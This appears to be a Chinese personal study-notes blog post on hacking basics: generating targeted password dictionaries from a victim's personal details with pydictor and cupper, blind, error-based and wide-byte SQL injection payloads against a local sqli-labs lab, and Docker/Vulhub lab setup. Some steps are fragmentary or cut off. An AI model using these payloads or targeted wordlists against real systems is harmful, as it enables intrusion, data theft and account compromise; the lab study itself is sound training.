2019.10.22注入

社攻密码字典的生成(工具)

Pydictor:强大的密码生成工具,合并密码字典,词频统计,去重,枚举数字字典.

Python pydictor.py -base d --len 4 4 生成纯数字四位密码

Python pydictor.py -base L --len 4 4 -o name.txt 生成纯字母四位密码到name.txt

Python pydictor.py -extend ex.txt --level 3 --len 3 10 -o lpl.txt (弱口令+用户信息+规则+过滤)

ex.txt是关于用户或者攻击对象的信息

Level是过滤结果的级别

Len生成密码的长度

 

Python pydictor.py -extend ex.txt --level 3 --len 3 10 --encode sha1 -o lp1l.txt生成sha1加密的字典

Python pydictor.py --sedb 接下输入收集过来的信息(set ename test),最后可以设置输出的路径(output c:\result.txt),以及运行run

 

Cupper:针对国人的社工密码生成器

 

 

 python2  .\cupper.py -i

 

 

 

基于布尔的盲注:

Step1:探测输入点,’/1’and 1=1%24   /1’and’1’=’1

 

Step2:收集数据库信息id=10’ and length(user())=14%23

用户名长度为14

 判断ascii码值

 

Step3:查询当前数据库中表,

Select distinct table_name from information_schema.columns where

table_schema=database()

 

 

Step4:获取执行表的字段名

 

 

 Pydictor使用

python pydictor.py -base d --len 4 4生成纯4位的数字密码

python pydictor.py -base L --len 1 4 -o name.txt生成14位的纯小写字母密码到name.txt

python pydictor.py -extend ex.txt --level 3 --len 3 5 根据扩展信息ex.txt来生成35位的密码(ex.txt是用户关于用户或者攻击对象的信息)

python pydictor.py -extend ex.txt --level 3 --len 3 5 --encode sha1 生成sha1加密的字典

python pydictor.py -sedb 接下输入手机过来的信息(set  ename  test),最后可以设置输出路径(output c:\result.txt),以及运行(run

 

盲注:用户提交的数据在后台数据库中执行之后,没有返回任何数据,无法字前端显示测试出的数据,需要使用盲注技术。

基于bool的盲注

基于时间的盲注

 

基于布尔的盲注:

Step1:探测输入点,’/  1and 1=1%23  /1and 1=1.......

注意:用户提交的数据被带入到后台数据库中执行,根据页面显示效果判断此处是否存在注入点

Step2:收集数据库信息(当前用户名、当前数据库、版本、所有数据库等等)

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10and length(user())=14%23

用户名长度是14

http127.0.0.1/sqli-labs-master/Less-8/index.php?id=10

Ascii(substr(user(),1,1))=114%23

用户名首字符是r,后续依次去判断

Security

Step3:查询当前数据库中的表

ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit0,1),1,1))=114

最终找到有价值的表

Step4:获取执行表的字段名

Select distinct column_name from information_schema.columns where table_name=0x7573657

 

报错注入的步骤:

step1:测试注入点

step2:获取数据库信息

?id=2' and extractvalue(1,concat(0x7e,(database(),0x73))%23+

step3:获取表名

?id=2' and extractvalue(

step4:获取表中的字段

 

step5:获取数据

 

 

宽字节注入:

mysql_real_escape_string($_GET['id'])对参数进行过滤转义,具有类似功能的函数有:addslaches() , mysql_escape_string()5.3之后版本被废除 ,魔术引号magic_quotes_gpc模块,针对特殊符号: ' " \ null  < >

 

mysql_query("SET NAMES 'gbk'");

mysql_set_charset("GBK"); //字符集编码设定%df'

GBK编码,针对汉字的一种编码方式:针对汉字的一种编码方式,使用两个字节编码一个汉字,

 

 

 

5c问题

 

 

 

Docker入门以及漏洞环境搭建

docker 开源的应用程序容器引擎,使用Go语言开发,借助于docker打包的应用程序,将这些应用程序包含到这个容器里面.实现虚拟化,容器完全使用的是沙箱机制,相互独立,占用资源非常少.

docker的三个概念:

镜像:image,docker镜像是一个只读的模板,比如我们在镜像中包含完整的操作系统,在该操作系统中可以安装LAMP环境,镜像可以创建容器.

容器:container,docker利用容器运行程序,容器时镜像中创建运行的一个实例,容器可以运行,关闭,可以删除.

仓库:repository,集中放镜像的地方,每个仓库中每个仓库中包含了多个镜像,可以私有可以公开,最大的仓库是dockerhub

Curl --s http://get.docker.com/s

 

使用VULHUB环境

http://vulhub.org/#/environments/

http://github.com/vulhub/vulhub

 

需要安装pip,他是python用来管理工具包的工具.

安装docker-compose.

pip install docker-compose

 

posted @ 2019-10-31 08:34  火狐隆美尔  阅读(172)  评论(0编辑  收藏  举报